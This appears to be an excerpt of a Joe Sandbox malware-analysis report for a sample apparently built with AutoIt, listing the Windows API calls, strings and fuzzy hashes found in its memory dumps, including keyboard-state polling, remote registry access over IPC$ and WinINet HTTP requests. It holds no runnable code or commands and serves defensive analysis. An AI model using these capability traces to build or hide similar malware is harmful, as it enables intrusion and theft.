                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              • Opcode ID: 9ba02e8457d08f0f1b4c49fce719e5141017b20f9caa67d5deb6168ed96633f7
                                              • Instruction ID: 7dfe7dfba706def04d298e3f0eb774cef89013a229470c129cb3c97e104afcb9
                                              • Opcode Fuzzy Hash: 9ba02e8457d08f0f1b4c49fce719e5141017b20f9caa67d5deb6168ed96633f7
                                              • Instruction Fuzzy Hash: E351A1B1900109BBDF15EBE0CD46EEEB7B9AF09340F100165F505B21A2DB316F98DBA5
                                              APIs
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • _memset.LIBCMT ref: 00088489
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000884BE
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000884DA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000884F6
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00088520
                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00088548
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00088553
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00088558
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: 738c8450fc9ab7a2e3604092152a3efc90163e5afad1c701a62e4a770d14d3ca
                                              • Instruction ID: 34d41d96f6625d83912aa0298398d728ec17fdc26e2909a878ec5703e703577a
                                              • Opcode Fuzzy Hash: 738c8450fc9ab7a2e3604092152a3efc90163e5afad1c701a62e4a770d14d3ca
                                              • Instruction Fuzzy Hash: F54108B2C1022DABDF11EBA4DC95DEEB7B8FF08340F404129F945A2162EB355E44CB90
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00090896
                                              • SetKeyboardState.USER32(?), ref: 00090901
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00090921
                                              • GetKeyState.USER32(000000A0), ref: 00090938
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00090967
                                              • GetKeyState.USER32(000000A1), ref: 00090978
                                              • GetAsyncKeyState.USER32(00000011), ref: 000909A4
                                              • GetKeyState.USER32(00000011), ref: 000909B2
                                              • GetAsyncKeyState.USER32(00000012), ref: 000909DB
                                              • GetKeyState.USER32(00000012), ref: 000909E9
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00090A12
                                              • GetKeyState.USER32(0000005B), ref: 00090A20
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: ea7fbdd89ca2062d44f9d144e79b07d82bb4aa0950bcb6a0b6e0526c7447d5f9
                                              • Instruction ID: 2eba1ba0d0ea73ab0264c436ed22a16045ecce1c1a83912699ac04e84bb74425
                                              • Opcode Fuzzy Hash: ea7fbdd89ca2062d44f9d144e79b07d82bb4aa0950bcb6a0b6e0526c7447d5f9
                                              • Instruction Fuzzy Hash: 1651B630B087892DFF75DBA088107EBBFF49F01380F08859995C2571C3DA649A8CDBA2
                                              APIs
                                                • Part of subcall function 00031F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00032412,?,00000000,?,?,?,?,00031AA7,00000000,?), ref: 00031F76
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000324AF
                                              • KillTimer.USER32(-00000001,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0003254A
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0006BFE7
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C018
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C02F
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00031AA7,00000000,?,?,00031EBE,?,?), ref: 0006C04B
                                              • DeleteObject.GDI32(00000000), ref: 0006C05D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: bcd9d6487b4d73d53bd5d2c348a4cda4ea0961d2080e6b30e1cd5b203a693ab7
                                              • Instruction ID: 6eb10ce6de845777b2fa8a44189326bbc90a50f9843fcadeae8c8bba26e0f0c8
                                              • Opcode Fuzzy Hash: bcd9d6487b4d73d53bd5d2c348a4cda4ea0961d2080e6b30e1cd5b203a693ab7
                                              • Instruction Fuzzy Hash: 5A617931518701DFFB769F18D948B3A77F6FF40316F108628E08A46960C779A892EF92
                                              APIs
                                                • Part of subcall function 000329AB: GetWindowLongW.USER32(?,000000EB), ref: 000329BC
                                              • GetSysColor.USER32(0000000F), ref: 000325AF
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: f8abc08ff0305e207ce4a2281b732f57cd43d1abfc59f6692f89365a98a533dc
                                              • Instruction ID: 1b41eb443c9d8eff4f89dce4b4412ff881e16fb4b13658e4d96a1cb84db881b7
                                              • Opcode Fuzzy Hash: f8abc08ff0305e207ce4a2281b732f57cd43d1abfc59f6692f89365a98a533dc
                                              • Instruction Fuzzy Hash: 4F41D531004540EFEB225F28DC99FB937AAEF0A335F184261FDA58A1E2C7348D41EB21
                                              APIs
                                                • Part of subcall function 00050B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00042A3E,?,00008000), ref: 00050BA7
                                                • Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00042ADF
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00042C2C
                                                • Part of subcall function 00043EBE: _wcscpy.LIBCMT ref: 00043EF6
                                                • Part of subcall function 0005386D: _iswctype.LIBCMT ref: 00053875
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                              • API String ID: 537147316-3738523708
                                              • Opcode ID: c4b44212ce4672dd3c0cfd4d7f2261eefc21a27863fd4c6fcc3627ce0eff5b9a
                                              • Instruction ID: 88ee61cce8c114f1da769ad9e3680cd73c205f4978a4d7408551fd10d4cb5a47
                                              • Opcode Fuzzy Hash: c4b44212ce4672dd3c0cfd4d7f2261eefc21a27863fd4c6fcc3627ce0eff5b9a
                                              • Instruction Fuzzy Hash: 2802ADB05083419FC764EF24C881AEFBBE5BF99314F40492DF499932A2DB30DA49CB56
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00090530
                                              • GetAsyncKeyState.USER32(000000A0), ref: 000905B1
                                              • GetKeyState.USER32(000000A0), ref: 000905CC
                                              • GetAsyncKeyState.USER32(000000A1), ref: 000905E6
                                              • GetKeyState.USER32(000000A1), ref: 000905FB
                                              • GetAsyncKeyState.USER32(00000011), ref: 00090613
                                              • GetKeyState.USER32(00000011), ref: 00090625
                                              • GetAsyncKeyState.USER32(00000012), ref: 0009063D
                                              • GetKeyState.USER32(00000012), ref: 0009064F
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00090667
                                              • GetKeyState.USER32(0000005B), ref: 00090679
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 861119933f9dccfb0083611f975a5f08e5a8cc702de43022602d63c356c61377
                                              • Instruction ID: 79073ea02e5c6b9357a4367289c7d4b5d068b6071520f708bba2a74aeaf3ff15
                                              • Opcode Fuzzy Hash: 861119933f9dccfb0083611f975a5f08e5a8cc702de43022602d63c356c61377
                                              • Instruction Fuzzy Hash: C241CA70504BCA6EFFB1976488047B7BEE06F51344F08805ED9C6475C1EBA899D8EFA2
                                              APIs
                                                • Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
                                                • Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC
                                              • CoInitialize.OLE32 ref: 000A8AED
                                              • CoUninitialize.OLE32 ref: 000A8AF8
                                              • CoCreateInstance.OLE32(?,00000000,00000017,000C3BBC,?), ref: 000A8B58
                                              • IIDFromString.OLE32(?,?), ref: 000A8BCB
                                              • VariantInit.OLEAUT32(?), ref: 000A8C65
                                              • VariantClear.OLEAUT32(?), ref: 000A8CC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 92b8dc648f303267013fe3bda1d1ccbbad41f967fad296dff5f91dd966b10890
                                              • Instruction ID: 275ab627dfe35242d8fac54a4e7560ae360dd2196b29f52b495c7b430609f1d7
                                              • Opcode Fuzzy Hash: 92b8dc648f303267013fe3bda1d1ccbbad41f967fad296dff5f91dd966b10890
                                              • Instruction Fuzzy Hash: F561A0702087119FD710DF94C889F9EB7E8BF46714F108819F9859B291DB74ED48CBA2
                                              APIs
                                              • __swprintf.LIBCMT ref: 00094451
                                              • __swprintf.LIBCMT ref: 0009445E
                                                • Part of subcall function 000538C8: __woutput_l.LIBCMT ref: 00053921
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00094488
                                              • LoadResource.KERNEL32(?,00000000), ref: 00094494
                                              • LockResource.KERNEL32(00000000), ref: 000944A1
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 000944C1
                                              • LoadResource.KERNEL32(?,00000000), ref: 000944D3
                                              • SizeofResource.KERNEL32(?,00000000), ref: 000944E2
                                              • LockResource.KERNEL32(?), ref: 000944EE
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0009454F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 7354719aef06e0938235cab32987b381c5916657201067773fedd6880106b604
                                              • Instruction ID: 60a03007b29d358f495e58f5d6a90afa0eb42b4906999ef68224a86594576b51
                                              • Opcode Fuzzy Hash: 7354719aef06e0938235cab32987b381c5916657201067773fedd6880106b604
                                              • Instruction Fuzzy Hash: 8431617150161AEBEF119FA0ED58EBF7BACEF04341F048415F915D6151E738DA22EB60
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 0003260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00032617
                                              • SetBkMode.GDI32(?,00000001), ref: 0003262C
                                              • GetStockObject.GDI32(00000005), ref: 00032634
                                              • GetClientRect.USER32(?), ref: 0006C0FC
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0006C113
                                              • GetWindowDC.USER32(?), ref: 0006C11F
                                              • GetPixel.GDI32(00000000,?,?), ref: 0006C12E
                                              • ReleaseDC.USER32(?,00000000), ref: 0006C140
                                              • GetSysColor.USER32(00000005), ref: 0006C15E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                              • String ID:
                                              • API String ID: 3430376129-0
                                              • Opcode ID: c8d7e34d49174987b8be1d7cb425fa7b13d047649fff3def8e4225dc852b63c1
                                              • Instruction ID: 5c0bfaf5b6f5f413cf74f866929e54185cb38d2645299f7baab50c7ac92b220b
                                              • Opcode Fuzzy Hash: c8d7e34d49174987b8be1d7cb425fa7b13d047649fff3def8e4225dc852b63c1
                                              • Instruction Fuzzy Hash: 40117931500605FFEBA25FA4EC08FA97BA6EF49321F144221FA6A950E1CB350A91EF10
                                              APIs
                                                • Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3
                                                • Part of subcall function 00032714: GetCursorPos.USER32(?), ref: 00032727
                                                • Part of subcall function 00032714: ScreenToClient.USER32(000F77B0,?), ref: 00032744
                                                • Part of subcall function 00032714: GetAsyncKeyState.USER32(00000001), ref: 00032769
                                                • Part of subcall function 00032714: GetAsyncKeyState.USER32(00000002), ref: 00032777
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 000BC69C
                                              • ImageList_EndDrag.COMCTL32 ref: 000BC6A2
                                              • ReleaseCapture.USER32 ref: 000BC6A8
                                              • SetWindowTextW.USER32(?,00000000), ref: 000BC752
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000BC765
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 000BC847
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                              • API String ID: 1924731296-2107944366
                                              • Opcode ID: 18fb90b6d5fd24df719a910227965cf405f329492eaf72f9c274b2f109f0d827
                                              • Instruction ID: fdf2ac335daa8e8553ef5d84f384541a356786d061531ab7244003323de7bb12
                                              • Opcode Fuzzy Hash: 18fb90b6d5fd24df719a910227965cf405f329492eaf72f9c274b2f109f0d827
                                              • Instruction Fuzzy Hash: 5751A070608304AFE704EF14CC5AFAA7BE5FB84310F00852DF9558B2E2CB74A955DB52
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000A211C
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000A2148
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000A218A
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000A219F
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A21AC
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000A21DC
                                              • InternetCloseHandle.WININET(00000000), ref: 000A2223
                                                • Part of subcall function 000A2B4F: GetLastError.KERNEL32(?,?,000A1EE3,00000000,00000000,00000001), ref: 000A2B64
                                                • Part of subcall function 000A2B4F: SetEvent.KERNEL32(?,?,000A1EE3,00000000,00000000,00000001), ref: 000A2B79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: 55a83a0b6909d20cb274581bfd5e85a345a51194baf1d61b71c1b511ed86f49a
                                              • Instruction ID: 6e6ee88c8cd67556b077e200d4e6c22d17775bbc06758b7465a06d8a56bfc426
                                              • Opcode Fuzzy Hash: 55a83a0b6909d20cb274581bfd5e85a345a51194baf1d61b71c1b511ed86f49a
                                              • Instruction Fuzzy Hash: 1A414AB1905208BFEB169F94CC89FFB7BACEB09354F004126FA059A192D7749E54DBA0
                                              APIs
                                                • Part of subcall function 0008B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0008B54D
                                                • Part of subcall function 0008B52D: GetCurrentThreadId.KERNEL32 ref: 0008B554
                                                • Part of subcall function 0008B52D: AttachThreadInput.USER32(00000000,?,0008A23B,?,00000001), ref: 0008B55B
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A246
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0008A263
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0008A266
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A26F
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0008A28D
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0008A290
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0008A299
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0008A2B0
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0008A2B3
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 14f95a1b7105b33eec4d061e592a9cf9eb4ae8d6ef12554acdcaec2e84d514fb
                                              • Instruction ID: 47a74d1d4ce2cc9333a79c5e8ddc38d9565bde9fe6b2fd487c845e9fa827307c
                                              • Opcode Fuzzy Hash: 14f95a1b7105b33eec4d061e592a9cf9eb4ae8d6ef12554acdcaec2e84d514fb
                                              • Instruction Fuzzy Hash: 9611E1B1A50618FEF6206F649C8AFAA7B2DEB4C750F110419F7806B0D1CAF35C50DBA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: 1aeeb91f067897beb889de9949e3266d70857961ff4cf01f3a453e39058624d3
                                              • Instruction ID: 9225b32ac6644e668b84c615e4c07b9a731af3757aedccebe75c285c5e694b1f
                                              • Opcode Fuzzy Hash: 1aeeb91f067897beb889de9949e3266d70857961ff4cf01f3a453e39058624d3
                                              • Instruction Fuzzy Hash: FAC18E71F0021A9FDF24DFA8C884BAEB7F5BB4A350F148569F905AB281E7709D44CB91
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00094802
                                              • LoadStringW.USER32(00000000), ref: 00094809
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009481F
                                              • LoadStringW.USER32(00000000), ref: 00094826
                                              • _wprintf.LIBCMT ref: 0009484C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009486A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00094847
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
